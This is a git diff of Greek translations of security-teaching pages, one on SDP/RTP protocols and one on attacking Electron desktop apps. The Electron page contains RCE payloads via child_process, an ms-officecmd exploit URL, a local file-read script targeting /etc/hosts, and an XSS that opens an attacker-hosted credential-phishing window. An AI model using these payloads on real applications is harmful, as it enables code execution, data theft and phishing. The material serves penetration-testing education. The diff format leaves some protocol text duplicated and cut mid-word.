Το SDP (Session Description Protocol) είναι ένα **κειμενοποιημένο μορφότυπο** που χρησιμοποιείται για να περιγράψει τα χαρακτηριστικά των πολυμεσικών συνεδριών, όπως φωνή, βίντεο ή διασκέψεις δεδομένων, σε δίκτυα IP. Αναπτύχθηκε από το **Internet Engineering Task Force (IETF)** και ορίζεται στο **RFC 4566**. Το SDP δεν χειρίζεται την πραγματική μετάδοση μέσων ή την ίδρυση συνεδρίας, αλλά χρησιμοποιείται σε συνδυασμό με άλλα πρωτόκολλα σήμανσης, όπως το **SIP (Session Initiation Protocol)**, για τη διαπραγμάτευση και την ανταλλαγή πληροφοριών σχετικά με τις ροές μέσων και τα χαρακτηριστικά τους.
|
||||
|
||||
Ορισμένα βασικά στοιχεία του SDP περιλαμβάνουν:
|
||||
Κάποια βασικά στοιχεία του SDP περιλαμβάνουν:
|
||||
|
||||
1. **Πληροφορίες Συνεδρίας**: Το SDP περιγράφει τις λεπτομέρειες μιας πολυμεσικής συνεδρίας, συμπεριλαμβανομένου του ονόματος της συνεδρίας, της περιγραφής της, της ώρας έναρξης και λήξης.
|
||||
2. **Ροές Πολυμέσων**: Το SDP καθορίζει τα χαρακτηριστικά των ροών πολυμέσων, όπως ο τύπος πολυμέσων (ήχος, βίντεο ή κείμενο), το πρωτόκολλο μεταφοράς (π.χ. RTP ή SRTP) και η μορφή των πολυμέσων (π.χ. πληροφορίες κωδικοποιητή).
|
||||
3. **Πληροφορίες Σύνδεσης**: Το SDP παρέχει πληροφορίες σχετικά με τη διεύθυνση δικτύου (διεύθυνση IP) και τον αριθμό θύρας όπου πρέπει να αποσταλεί ή να ληφθεί το μέσο.
|
||||
4. **Χαρακτηριστικά**: Το SDP υποστηρίζει τη χρήση χαρακτηριστικών για την παροχή επιπλέον, προαιρετικών πληροφοριών σχετικά με μια συνεδρία ή ροή πολυμέσων. Τα χαρακτηριστικά μπορούν να χρησιμοποιηθούν για τον καθορισμό διάφορων χαρακτηριστικών, όπως κλειδιά κρυπτογράφησης, απαιτήσεις εύρους ζώνης ή μηχανισμούς έλεγχου πολυμέσων.
|
||||
1. **Πληροφορίες Συνεδρίας**: Το SDP περιγράφει τις λεπτομέρειες μιας πολυμεσικής συνεδρίας, συμπεριλαμβανομένου του ονόματος της συνεδρίας, της περιγραφής της συνεδρίας, της ώρας έναρξης και λήξης.
|
||||
2. **Ροές Μέσων**: Το SDP ορίζει τα χαρακτηριστικά των ροών μέσων, όπως ο τύπος μέσου (ήχος, βίντεο, ή κείμενο), το πρωτόκολλο μεταφοράς (π.χ. RTP ή SRTP) και τη μορφή του μέσου (π.χ. πληροφορίες κωδικοποιητή).
|
||||
3. **Πληροφορίες Σύνδεσης**: Το SDP παρέχει πληροφορίες σχετικά με τη διεύθυνση δικτύου (διεύθυνση IP) και τον αριθμό θύρας όπου πρέπει να σταλούν ή να ληφθούν τα μέσα.
|
||||
4. **Χαρακτηριστικά**: Το SDP υποστηρίζει τη χρήση χαρακτηριστικών για την παροχή επιπλέον, προαιρετικών πληροφοριών σχετικά με μια συνεδρία ή ροή μέσου. Τα χαρακτηριστικά μπορούν να χρησιμοποιηθούν για την καθορισμό διάφορων χαρακτηριστικών όπως κλειδιά κρυπτογράφησης, απαιτήσεις εύρους ζώνης ή μηχανισμούς ελέγχου μέσων.
|
||||
|
||||
Το SDP χρησιμοποιείται συνήθως στην ακόλουθη διαδικασία:
|
||||
Το SDP χρησιμοποιείται τυπικά στην ακόλουθη διαδικασία:
|
||||
|
||||
1. Ένα πρωτοβουλιακό μέρος δημιουργεί μια περιγραφή SDP της προτεινόμενης πολυμεσικής συνεδρίας, συμπεριλαμβανομένων των λεπτομερειών των ροών πολυμέσων και των χαρακτηριστικών τους.
|
||||
2. Η περιγραφή SDP αποστέλλεται στο λαμβάνον μέρος, συνήθως ενσωματωμένη σε ένα μήνυμα πρωτοκόλλου σήμανσης όπως το SIP ή το RTSP.
|
||||
3. Το λαμβάνον μέρος επεξεργάζεται την περιγραφή SDP και, με βάση τις δυνατότητές του, μπορεί να αποδεχθεί, απορρίψει ή τροποποιήσει την προτεινόμενη συνεδρία.
|
||||
4. Η τελική περιγραφή SDP αποστέλλεται πίσω στο πρωτοβουλιακό μέρος ως μέρος του μηνύματος πρωτοκόλλου σήμανσης, ολοκληρώνοντας τη διαδικασία διαπραγμάτευσης.
|
||||
1. Ένας εκκινών φορέας δημιουργεί μια περιγραφή SDP της προτεινόμενης πολυμεσικής συνεδρίας, συμπεριλαμβανομένων των λεπτομερειών των ροών μέσων και των χαρακτηριστικών τους.
|
||||
2. Η περιγραφή SDP στέλνεται στον αποδέκτη, συνήθως ενσωματωμένη σε ένα μήνυμα πρωτοκόλλου σήμανσης όπως το SIP ή το RTSP.
|
||||
3. Ο αποδέκτης επεξεργάζεται την περιγραφή SDP και, με βάση τις δυνατότητές του, μπορεί να αποδεχτεί, απορρίψει ή τροποποιήσει την προτεινόμενη συνεδρία.
|
||||
4. Η τελική περιγραφή SDP στέλνεται πίσω στον εκκινών φορέα ως μέρος του μηνύματος πρωτοκόλλου σήμανσης, ολοκληρώνοντας τη διαδικασία διαπραγμάτευσης.
|
||||
|
||||
Η απλότητα και η ευελιξία του SDP το καθιστούν ένα ευρέως υιοθετημένο πρότυπο για την περιγραφή πολυμεσικών συνεδριών σε διάφορα συστήματα επικοινωνίας, παίζοντας ένα κρίσιμο ρόλο στην ίδρυση και διαχείριση πολυμεσικών συνεδριών πραγματικού χρόνου σε δίκτυα IP.
|
||||
Η απλότητα και η ευελιξία του SDP το καθιστούν ένα ευρέως υιοθετημένο πρότυπο για την περιγραφή πολυμεσικών συνεδριών σε διάφορα συστήματα επικοινωνίας, παίζοντας ένα κρίσιμο ρόλο στην ίδρυση και διαχείριση πραγματικού χρόνου πολυμεσικών συνεδριών σε δίκτυα IP.
|
||||
|
||||
### RTP / RTCP / SRTP / ZRTP
|
||||
|
||||
1. **RTP (Real-time Transport Protocol)**: Το RTP είναι ένα πρωτόκολλο δικτύου που σχεδιάστηκε για την παράδοση ήχου και εικόνας, ή άλλων πολυμέσων πραγματικού χρόνου, σε δίκτυα IP. Αναπτύχθηκε από το **IETF** και καθορίζεται στο **RFC 3550**. Το RTP χρησιμοποιείται συνήθως με πρωτόκολλα σήμανσης όπως το SIP και το H.323 για τη δυνατότητα πολυμεσικής επικοινωνίας. Το RTP παρέχει μηχανισμούς για τον **συγχρονισμό**, την **ακολουθία** και την **χρονοσήμανση** των ροών πολυμέσων, βοηθώντας στην ομαλή και έγκαιρη αναπαραγωγή τω
|
||||
1. **RTP (Πρωτόκολλο Μεταφοράς Πραγματικού Χρόνου)**: Το RTP είναι ένα πρωτόκολλο δικτύου σχεδιασμένο για τη μετάδοση δεδομένων ήχου και βίντεο, ή άλλων πολυμεσικών σε πραγματικό χρόνο, σε δίκτυα IP. Αναπτύχθηκε από το **IETF** και ορίζεται στο **RFC 3550**. Το RTP χρησιμοποιείται συνήθως με πρωτόκολλα σήμανσης όπως το SIP και το H.323 για να επιτρέψει την πολυμεσική επικοινωνία. Το RTP παρέχει μηχανισμούς για **συγχρονισμό**, **ακολουθία** και **σήμανση χρόνου** των ροών μέσων, βοηθώντας στην εξασφάλιση ομαλής και έγκαιρης αναπαραγωγής μέσων.
|
||||
2. **RTCP (Πρωτόκολλο Έλεγχου Μεταφοράς Πραγματικού Χρόνου)**: Το RTCP είναι ένα συνοδευτικό πρωτόκολλο του RTP, χρησιμοποιούμενο για την παρακολούθηση της ποιότητας υπηρεσιών (QoS) και την παροχή ανατροφοδότησης σχετικά με τη μετάδοση των ροών μέσων. Ορίζεται στο ίδιο **RFC 3550** με το RTP, το RTCP **ανταλλάσσει περιοδικά πακέτα ελέγχου μεταξύ συμμετεχόντων σε μια συνεδρία RTP**. Μοιράζεται πληροφορίες όπως απώλεια πακέτων, θόρυβος και χρόνος κυκλοφορίας, τα οποία βοηθούν στη διάγνωση και προσαρμογή στις συνθήκες του δικτύου, βελτιώνοντας συνολικά την ποιότητα των μέσων.
|
||||
3. **SRTP (Ασφαλές Πρωτόκολλο Μεταφοράς Πραγματικού Χρόνου)**: Το SRTP είναι μια επέκταση του RTP που παρέχει **κρυπτογράφηση**, **επαλήθευση μηνύματος** και **προστασία από επανάληψη** για τις ροές μέσων, εξασφαλίζοντας την ασφαλή μετάδοση ευαίσθητων δεδομένων ήχου και βίντεο. Ορίζεται στο **RFC 3711**, το SRTP χρησιμοποιεί κρυπτογραφικούς αλγόριθμους όπως το AES για κρυπτογράφηση και το HMAC-SHA1 για επαλήθευση μηνύματος. Το SRTP χρησιμοποιείται συχνά σε συνδυασμό με ασφαλή πρωτόκολλα σήμανσης όπως το SIP μέσω TLS για να παρέχει ασφάλεια από άκρο σε άκρο στην πολυμεσική επικοινωνία.
|
||||
4. **ZRTP (Πρωτόκολλο Μεταφοράς Πραγματικού Χρόνου Zimmermann)**: Το ZRTP είναι ένα κρυπτογραφικό πρωτόκολλο συμφωνίας κλειδιών που παρέχει **κρυπτογράφηση άκρο προς άκρο** για τις ροές μέσων RTP. Αναπτύχθηκε από τον Phil Zimmermann, τον δημιουργό του PGP, το ZRTP περιγράφεται στο **RFC 6189**. Αντίθετα με το SRTP, που βασίζεται σε πρωτόκολλα σήμανσης για την ανταλλαγή κλειδιών, το ZRTP σχεδιάστηκε να λειτουργεί ανεξάρτητα από το πρωτόκολλο σήμανσης. Χρησιμοποιεί την **συμφωνία κλειδιών Diffie-Hellman** για να καθιερώσει ένα κοινό μυστικό μεταξύ των επικοινωνούντων μερών, χωρίς την ανάγκη προηγο
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
# Εφαρμογές Electron Desktop
|
||||
# Εφαρμογές Desktop Electron
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -10,10 +10,24 @@
|
|||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια στο GitHub.
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλου λογισμικού**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αναλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλο λογισμικό που κλέβει πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε την ιστοσελίδα τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
---
|
||||
|
||||
## Εισαγωγή
|
||||
|
||||
Το Electron συνδυάζει ένα τοπικό backend (με **NodeJS**) και ένα frontend (**Chromium**), αν και λείπουν μερικοί μηχανισμοί ασφαλείας των σύγχρονων περιηγητών.
|
||||
|
@ -32,11 +46,11 @@ npx asar extract-file app.asar main.js #Extract just a file
|
|||
Το Electron έχει 2 τύπους διεργασιών:
|
||||
|
||||
* Κύρια Διεργασία (έχει πλήρη πρόσβαση στο NodeJS)
|
||||
* Διεργασία Απεικονιστή (θα πρέπει να έχει περιορισμένη πρόσβαση στο NodeJS για λόγους ασφαλείας)
|
||||
* Διεργασία Αποδότη (θα πρέπει να έχει περιορισμένη πρόσβαση στο NodeJS για λόγους ασφαλείας)
|
||||
|
||||
![](<../../../.gitbook/assets/image (307) (5) (1).png>)
|
||||
![](<../../../.gitbook/assets/image (179).png>)
|
||||
|
||||
Μια **διεργασία απεικονιστή** θα είναι ένα παράθυρο περιήγησης που φορτώνει ένα αρχείο:
|
||||
Μια **διεργασία αποδότη** θα είναι ένα παράθυρο περιήγησης που φορτώνει ένα αρχείο:
|
||||
```javascript
|
||||
const {BrowserWindow} = require('electron');
|
||||
let win = new BrowserWindow();
|
||||
|
@ -55,9 +69,9 @@ win.loadURL(`file://path/to/index.html`);
|
|||
* Node Integration σε Workers
|
||||
* **`nodeIntegrationInSubframes`** - είναι `off` από προεπιλογή.
|
||||
* Αν το **`nodeIntegration`** είναι **ενεργοποιημένο**, αυτό θα επιτρέψει τη χρήση των **Node.js APIs** σε ιστοσελίδες που φορτώνονται σε iframes μέσα σε μια εφαρμογή Electron.
|
||||
* Αν το **`nodeIntegration`** είναι **απενεργοποιημένο**, τότε τα preloads θα φορτώνονται στο iframe
|
||||
* Αν το **`nodeIntegration`** είναι **απενεργοποιημένο**, τότε τα preloads θα φορτώνονται στο iframe.
|
||||
|
||||
Παράδειγμα ρύθμισης:
|
||||
Παράδειγμα διαμόρφωσης:
|
||||
```javascript
|
||||
const mainWindowOptions = {
|
||||
title: 'Discord',
|
||||
|
@ -103,7 +117,7 @@ Example Payloads (Linux & MacOS):
|
|||
```
|
||||
## Ενσωμάτωση Τοπικού Κώδικα στο Electron
|
||||
|
||||
Εάν μπορείτε να εκτελέσετε τοπικά μια εφαρμογή Electron, είναι δυνατόν να την κάνετε να εκτελέσει αυθαίρετο κώδικα JavaScript. Ελέγξτε πώς στο:
|
||||
Εάν μπορείτε να εκτελέσετε τοπικά μια εφαρμογή Electron, είναι δυνατόν να την κάνετε να εκτελέσει αυθαίρετο κώδικα JavaScript. Ελέγξτε πώς μπορείτε να το κάνετε αυτό:
|
||||
|
||||
{% content-ref url="../../../macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md" %}
|
||||
[macos-electron-applications-injection.md](../../../macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md)
|
||||
|
@ -119,11 +133,11 @@ require('child_process').exec('calc');
|
|||
top.require('child_process').exec('open /System/Applications/Calculator.app');
|
||||
</script>
|
||||
```
|
||||
<figure><img src="../../../.gitbook/assets/image (5) (4).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="../../../.gitbook/assets/image (1107).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
## RCE: preload
|
||||
|
||||
Το σενάριο που υποδεικνύεται σε αυτή τη ρύθμιση **φορτώνεται πριν από άλλα σενάρια στον αποδότη**, έτσι έχει **απεριόριστη πρόσβαση στα APIs του Node**:
|
||||
Το script που υποδεικνύεται σε αυτή τη ρύθμιση **φορτώνεται πριν από άλλα scripts στον renderer**, έχοντας **απεριόριστη πρόσβαση στα Node APIs**:
|
||||
```javascript
|
||||
new BrowserWindow{
|
||||
webPreferences: {
|
||||
|
@ -193,20 +207,20 @@ window.addEventListener('click', (e) => {
|
|||
|
||||
Για περισσότερες πληροφορίες σχετικά με αυτά τα παραδείγματα ελέγξτε [https://shabarkin.medium.com/1-click-rce-in-electron-applications-79b52e1fe8b8](https://shabarkin.medium.com/1-click-rce-in-electron-applications-79b52e1fe8b8) και [https://benjamin-altpeter.de/shell-openexternal-dangers/](https://benjamin-altpeter.de/shell-openexternal-dangers/)
|
||||
|
||||
Κατά την ανάπτυξη μιας εφαρμογής Electron desktop, είναι κρίσιμο να διασφαλιστούν οι σωστές ρυθμίσεις για το `nodeIntegration` και το `contextIsolation`. Έχει επιβεβαιωθεί ότι η **εκτέλεση κώδικα απομακρυσμένα (RCE)** προς τα preload scripts ή τον φυσικό κώδικα του Electron από την κύρια διαδικασία αποτρέπεται αποτελεσματικά με αυτές τις ρυθμίσεις σε ισχύ.
|
||||
Κατά την ανάπτυξη μιας εφαρμογής επιφάνειας εργασίας Electron, είναι ζωτικής σημασίας η διασφάλιση των σωστών ρυθμίσεων για το `nodeIntegration` και το `contextIsolation`. Έχει επιβεβαιωθεί ότι η **εκτέλεση κώδικα απομακρυσμένα (RCE)** προς τα preload scripts ή τον φυσικό κώδικα του Electron από την κύρια διαδικασία αποτρέπεται αποτελεσματικά με αυτές τις ρυθμίσεις σε ισχύ.
|
||||
|
||||
Κατά την αλληλεπίδραση ενός χρήστη με συνδέσμους ή με το άνοιγμα νέων παραθύρων, ενεργοποιούνται συγκεκριμένοι ακροατές συμβάντων, οι οποίοι είναι κρίσιμοι για την ασφάλεια και τη λειτουργικότητα της εφαρμογής:
|
||||
Κατά τη διάρκεια της αλληλεπίδρασης ενός χρήστη με συνδέσμους ή το άνοιγμα νέων παραθύρων, ενεργοποιούνται συγκεκριμένοι ακροατές συμβάντων, οι οποίοι είναι κρίσιμοι για την ασφάλεια και τη λειτουργικότητα της εφαρμογής:
|
||||
```javascript
|
||||
webContents.on("new-window", function (event, url, disposition, options) {}
|
||||
webContents.on("will-navigate", function (event, url) {}
|
||||
```
|
||||
Αυτοί οι ακροατές **αντικαθίστανται από την εφαρμογή επιφάνειας εργασίας** για την υλοποίηση της **επιχειρηματικής λογικής** της. Η εφαρμογή αξιολογεί εάν ένας πλοηγούμενος σύνδεσμος πρέπει να ανοίξει εσωτερικά ή σε έναν εξωτερικό περιηγητή ιστού. Αυτή η απόφαση καθορίζεται συνήθως μέσω μιας συνάρτησης, `openInternally`. Εάν αυτή η συνάρτηση επιστρέφει `false`, υποδηλώνει ότι ο σύνδεσμος πρέπει να ανοίξει εξωτερικά, χρησιμοποιώντας τη συνάρτηση `shell.openExternal`.
|
||||
Αυτοί οι ακροατές **αντικαθίστανται από την εφαρμογή επιφάνειας εργασίας** για την υλοποίηση της **επιχειρηματικής λογικής** της. Η εφαρμογή αξιολογεί εάν ένας πλοηγούμενος σύνδεσμος πρέπει να ανοίξει εσωτερικά ή σε εξωτερικό πρόγραμμα περιήγησης στον ιστό. Αυτή η απόφαση καθορίζεται συνήθως μέσω μιας συνάρτησης, `openInternally`. Εάν αυτή η συνάρτηση επιστρέφει `false`, υποδηλώνει ότι ο σύνδεσμος πρέπει να ανοίξει εξωτερικά, χρησιμοποιώντας τη συνάρτηση `shell.openExternal`.
|
||||
|
||||
**Εδώ υπάρχει απλοποιημένο ψευδοκώδικα:**
|
||||
|
||||
![https://miro.medium.com/max/1400/1\*iqX26DMEr9RF7nMC1ANMAA.png](<../../../.gitbook/assets/image (638) (2) (1) (1).png>)
|
||||
![https://miro.medium.com/max/1400/1\*iqX26DMEr9RF7nMC1ANMAA.png](<../../../.gitbook/assets/image (258).png>)
|
||||
|
||||
![https://miro.medium.com/max/1400/1\*ZfgVwT3X1V\_UfjcKaAccag.png](<../../../.gitbook/assets/image (620).png>)
|
||||
![https://miro.medium.com/max/1400/1\*ZfgVwT3X1V\_UfjcKaAccag.png](<../../../.gitbook/assets/image (960).png>)
|
||||
|
||||
Οι βέλτιστες πρακτικές ασφαλείας του Electron JS συνιστούν να μην γίνεται δεκτό μη αξιόπιστο περιεχόμενο με τη συνάρτηση `openExternal`, καθώς αυτό θα μπορούσε να οδηγήσει σε RCE μέσω διαφόρων πρωτοκόλλων. Τα λειτουργικά συστήματα υποστηρίζουν διαφορετικά πρωτόκολλα που ενδέχεται να ενεργοποιήσουν RCE. Για λεπτομερείς παραδείγματα και περαιτέρω εξήγηση σχετικά με αυτό το θέμα, μπορεί κάποιος να ανατρέξει σε [αυτό τον πόρο](https://positive.security/blog/url-open-rce#windows-10-19042), ο οποίος περιλαμβάνει παραδείγματα πρωτοκόλλων των Windows που μπορούν να εκμεταλλευτούν αυτήν την ευπάθεια.
|
||||
|
||||
|
@ -228,7 +242,7 @@ window.open("ms-officecmd:%7B%22id%22:3,%22LocalProviders.LaunchOfficeAppForResu
|
|||
|
||||
**Η απενεργοποίηση του `contextIsolation` επιτρέπει τη χρήση των ετικετών `<webview>`,** παρόμοια με την `<iframe>`, για την ανάγνωση και εξυφάντωση τοπικών αρχείων. Ένα παράδειγμα που παρέχεται δείχνει πώς να εκμεταλλευτείτε αυτήν την ευπάθεια για την ανάγνωση των περιεχομένων εσωτερικών αρχείων:
|
||||
|
||||
![](../../../.gitbook/assets/1-u1jdryuwaevwjmf_f2ttjg.png)
|
||||
![](<../../../.gitbook/assets/1 u1jdRYuWAEVwJmf_F2ttJg (1).png>)
|
||||
|
||||
Επιπλέον, μια άλλη μέθοδος για **την ανάγνωση ενός εσωτερικού αρχείου** κοινοποιείται, επισημαίνοντας μια κρίσιμη ευπάθεια ανάγνωσης τοπικού αρχείου σε μια εφαρμογή επιφάνειας εργασίας Electron. Αυτό περιλαμβάνει την ενσωμάτωση ενός script για την εκμετάλλευση της εφαρμογής και την εξυφάντωση δεδομένων:
|
||||
```html
|
||||
|
@ -241,7 +255,7 @@ function j(){alert('pwned contents of /etc/hosts :\n\n '+frames[0].document.body
|
|||
```
|
||||
## **RCE: XSS + Παλιό Chromium**
|
||||
|
||||
Αν το **chromium** που χρησιμοποιείται από την εφαρμογή είναι **παλιό** και υπάρχουν **γνωστές** **ευπαθείες** σε αυτό, ενδέχεται να είναι δυνατή η **εκμετάλλευσή του και η απόκτηση RCE μέσω ενός XSS**.\
|
||||
Αν το **chromium** που χρησιμοποιείται από την εφαρμογή είναι **παλιό** και υπάρχουν **γνωστές** **ευπαθείες** σε αυτό, είναι πιθανό να είναι δυνατή η **εκμετάλλευσή του και η απόκτηση RCE μέσω ενός XSS**.\
|
||||
Μπορείτε να δείτε ένα παράδειγμα σε αυτό το **writeup**: [https://blog.electrovolt.io/posts/discord-rce/](https://blog.electrovolt.io/posts/discord-rce/)
|
||||
|
||||
## **XSS Phishing μέσω παράκαμψης εσωτερικού URL regex**
|
||||
|
@ -255,7 +269,7 @@ webContents.on("will-navigate", function (event, url) {} // o
|
|||
```
|
||||
Η κλήση στο **`openInternally`** θα αποφασίσει εάν το **σύνδεσμος** θα **ανοίξει** στο **παράθυρο της επιφάνειας εργασίας** καθώς ανήκει στην πλατφόρμα, **ή** αν θα ανοίξει στο **πρόγραμμα περιήγησης ως πόρος τρίτου μέρους**.
|
||||
|
||||
Στην περίπτωση που το **regex** που χρησιμοποιείται από τη συνάρτηση είναι **ευάλωτο σε παρακάμψεις** (για παράδειγμα μην **αποδράσει των τελείων των υποτομέων**) ένας επιτιθέμενος θα μπορούσε να καταχραστεί το XSS για να **ανοίξει ένα νέο παράθυρο το οποίο** θα βρίσκεται στη υποδομή του επιτιθέμενου **ζητώντας διαπιστευτήρια** από τον χρήστη:
|
||||
Στην περίπτωση που το **regex** που χρησιμοποιείται από τη συνάρτηση είναι **ευάλωτο σε παρακάμψεις** (για παράδειγμα μην **αποδράσει τα τελεία των υποτομέων**) ένας επιτιθέμενος θα μπορούσε να εκμεταλλευτεί το XSS για να **ανοίξει ένα νέο παράθυρο το οποίο** θα βρίσκεται στη υποδομή του επιτιθέμενου **ζητώντας διαπιστευτήρια** από τον χρήστη:
|
||||
```html
|
||||
<script>
|
||||
window.open("<http://subdomainagoogleq.com/index.html>")
|
||||
|
@ -263,7 +277,7 @@ window.open("<http://subdomainagoogleq.com/index.html>")
|
|||
```
|
||||
## **Εργαλεία**
|
||||
|
||||
* [**Electronegativity**](https://github.com/doyensec/electronegativity) είναι ένα εργαλείο για την αναγνώριση λανθασμένων ρυθμίσεων και αντι-προτύπων ασφάλειας σε εφαρμογές που βασίζονται σε Electron.
|
||||
* [**Electronegativity**](https://github.com/doyensec/electronegativity) είναι ένα εργαλείο για την αναγνώριση λανθασμένων ρυθμίσεων και αντι-προτύπων ασφάλειας σε εφαρμογές βασισμένες σε Electron.
|
||||
* [**Electrolint**](https://github.com/ksdmitrieva/electrolint) είναι ένα πρόσθετο του VS Code για εφαρμογές Electron που χρησιμοποιεί το Electronegativity.
|
||||
* [**nodejsscan**](https://github.com/ajinabraham/nodejsscan) για έλεγχο ευπαθών βιβλιοθηκών τρίτων
|
||||
* [**Electro.ng**](https://electro.ng/): Πρέπει να το αγοράσετε
|
||||
|
@ -305,16 +319,28 @@ npm start
|
|||
* Περισσότερες έρευνες και αναλύσεις σχετικά με την ασφάλεια του Electron στο [https://github.com/doyensec/awesome-electronjs-hacking](https://github.com/doyensec/awesome-electronjs-hacking)
|
||||
* [https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81](https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81)
|
||||
|
||||
## WhiteIntel
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλων λογισμικών**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αρπαγών λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλα λογισμικά που κλέβουν πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε την ιστοσελίδα τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το hacking στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**Την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Μοιραστείτε τα hacking tricks σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -2,19 +2,33 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Ειδικός Ερυθρού Συνεργείου HackTricks AWS)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Άλλοι τρόποι για να υποστηρίξετε το HackTricks:
|
||||
Άλλοι τρόποι υποστήριξης των HackTricks:
|
||||
|
||||
* Εάν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
